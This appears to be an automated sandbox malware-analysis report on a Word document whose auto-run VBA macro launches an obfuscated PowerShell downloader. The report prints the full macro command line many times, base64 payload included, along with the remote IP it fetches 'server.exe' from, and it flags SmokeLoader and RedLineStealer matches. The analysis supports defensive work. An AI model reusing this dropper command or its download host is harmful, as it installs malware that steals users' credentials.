Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{89AD645A-9CDB-46AF-ADC6-EB1F41B38A0D}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /download_22/server.exe HTTP/1.1Host: 45.84.0.173Connection: Keep-Alive
Source: powershell.exe, 00000006.00000002.358011203.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002929000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://45.84.0.173
Source: powershell.exe, 00000005.00000002.362102423.0000000002960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.357966848.0000000002397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://45.84.0.173/download_22/server.exe
Source: powershell.exe, 00000006.00000002.357966848.000000000247E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.cr
Source: powershell.exe, 00000006.00000002.358011203.00000000038BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.362102423.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Document contains an embedded VBA macro which may execute processes
Source: 472.rtf.doc OLE, VBA macro line: Program = Shell(cmdStr, vbHide)
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
Document contains an embedded VBA macro with suspicious strings
Source: 472.rtf.doc OLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function AutoOpen, String powershell: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;" Name: AutoOpen
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_000007FE898B00DD 6_2_000007FE898B00DD
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 472.rtf.doc OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function AutoOpen Name: AutoOpen
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE, VBA macro line: Sub AutoOpen()
Document contains embedded VBA macros
Source: 472.rtf.doc OLE indicator, VBA macros: true
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE indicator, VBA macros: true
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Yara signature match
Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@11/17@0/1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244BF0B CreateToolhelp32Snapshot,Module32First, 7_2_0244BF0B
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$72.rtf.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp Jump to behavior
Source: 472.rtf.doc OLE indicator, Word Document stream: true
Source: 472.rtf.doc OLE document summary: title field not present or empty
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\timeout.exe Console Write: ................D.................W.a.i.t.i.n.g. .f.o.r. .3......................................................................d(............. Jump to behavior
Source: C:\Windows\System32\timeout.exe Console Write: ................D............... .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J........d(.......(..... Jump to behavior
Source: C:\Windows\System32\timeout.exe Console Write: ................,.................2.............,. .p.r......................................................................................... Jump to behavior
Source: C:\Windows\System32\timeout.exe Console Write: ................D.................1.............,. .p.r......................................................................................... Jump to behavior
Source: C:\Windows\System32\timeout.exe Console Write: ................p.................0.............,. .p.r......................................................................................... Jump to behavior
Source: C:\Windows\System32\timeout.exe Console Write: ................d...............................,. .p.r......................................................................................... Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\timeout.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 472.rtf.doc ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA= Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Section loaded: msimg32.dll Jump to behavior
Source: 472.rtf.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\ 472.rtf.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 472.rtf.doc Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Suspicious command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244DE6C push ebp; retf 7_2_0244DE6F
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244CD12 push ebx; iretd 7_2_0244CD37
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244CB19 pushad ; iretd 7_2_0244CB1A
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244FC2D push esp; retf 7_2_0244FC30
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244CB97 push ebx; iretd 7_2_0244CD37
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_02451AA2 push 94B57A95h; iretd 7_2_02451AB6

Persistence and Installation Behavior
barindex
Drops PE files with benign system names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
